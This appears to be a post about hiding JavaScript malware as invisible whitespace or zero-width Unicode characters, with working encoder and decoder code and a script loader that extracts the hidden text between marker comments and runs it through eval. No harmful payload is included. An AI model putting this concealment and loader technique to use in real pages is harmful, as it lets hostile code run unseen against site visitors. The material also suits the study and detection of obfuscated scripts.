I gave a talk at BlackHat many years ago about JS malware, and proposed obfuscating malicious JS like this:
- Treat the JS code as 7-bit ASCII
- For each character, convert its bits into whitespace: 1 = space, 0 = tab
- A = "1000001" = space tab tab tab tab tab space
- Concatenate it all together; a \n marks the end
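The steps above can be sketched roughly like this. It is only an illustration, not the code from the talk: `dehydrate` is a name I made up, and `hydrate` is borrowed from the call in the snippet in this post, whose real implementation isn't shown. I'm also assuming the decoder should ignore anything that isn't a space or tab and stop at the first \n.

```javascript
// Sketch only: names and details are assumptions, not the original talk's code.
const ONE = " ";   // bit 1 -> space
const ZERO = "\t"; // bit 0 -> tab

// Encode 7-bit ASCII text as spaces and tabs, terminated by "\n".
function dehydrate(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if (code > 127) throw new RangeError("not 7-bit ASCII: " + ch);
    const bits = code.toString(2).padStart(7, "0");
    for (const bit of bits) out += bit === "1" ? ONE : ZERO;
  }
  return out + "\n";
}

// Decode: keep only spaces and tabs before the first "\n",
// then read 7 bits per character.
function hydrate(ws) {
  const end = ws.indexOf("\n");
  const body = (end === -1 ? ws : ws.slice(0, end)).replace(/[^ \t]/g, "");
  let text = "";
  for (let i = 0; i + 7 <= body.length; i += 7) {
    let code = 0;
    for (const c of body.slice(i, i + 7)) code = code * 2 + (c === ONE ? 1 : 0);
    text += String.fromCharCode(code);
  }
  return text;
}
```

For example, `dehydrate("A")` gives space, five tabs, space, then \n, matching the "A" line above, and `hydrate(dehydrate(s))` returns `s` for any 7-bit ASCII string without needing a separator between characters, since every character is exactly 7 symbols wide.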
So you can represent JS code as nothing but whitespace, which means this can be malicious code (the payload is the invisible whitespace between the two marker comments):
<script>
//st4rt
//3nd
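// The marker strings are split so these lines do not match the search themselves.
var html = document.body.innerHTML;
var startMarker = "//st" + "4rt";
var start = html.indexOf(startMarker);
var end = html.indexOf("//3" + "nd");
// Take only the whitespace payload between the two marker comments.
var code = html.substring(start + startMarker.length, end);
// hydrate() (not shown) turns the whitespace back into JS source.
eval(hydrate(code));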
</script>
I like that a lot. I wonder if it might be possible to use the Unicode zero-width space and zero-width non-joiner characters instead. Then there wouldn't even be any whitespace to see.
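A rough sketch of what that variant might look like, reusing the same 7-bit scheme. The mapping (1 = U+200B zero-width space, 0 = U+200C zero-width non-joiner) and the function names `toZeroWidth` and `fromZeroWidth` are my own assumptions, picked only for illustration.

```javascript
// Assumed mapping (not from the thread): 1 -> U+200B, 0 -> U+200C.
const ZW_ONE = "\u200B";  // ZERO WIDTH SPACE
const ZW_ZERO = "\u200C"; // ZERO WIDTH NON-JOINER

// Encode 7-bit ASCII text as a run of zero-width characters.
function toZeroWidth(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if (code > 127) throw new RangeError("not 7-bit ASCII: " + ch);
    for (const bit of code.toString(2).padStart(7, "0")) {
      out += bit === "1" ? ZW_ONE : ZW_ZERO;
    }
  }
  return out;
}

// Decode: drop everything except the two zero-width characters,
// then read 7 bits per character.
function fromZeroWidth(s) {
  const body = s.replace(/[^\u200B\u200C]/g, "");
  let text = "";
  for (let i = 0; i + 7 <= body.length; i += 7) {
    let code = 0;
    for (const c of body.slice(i, i + 7)) code = code * 2 + (c === ZW_ONE ? 1 : 0);
    text += String.fromCharCode(code);
  }
  return text;
}
```

One caveat, as far as I know: unlike space and tab, U+200B is not treated as whitespace by the JS grammar, so the encoded run would have to sit inside a comment or a string rather than in bare source.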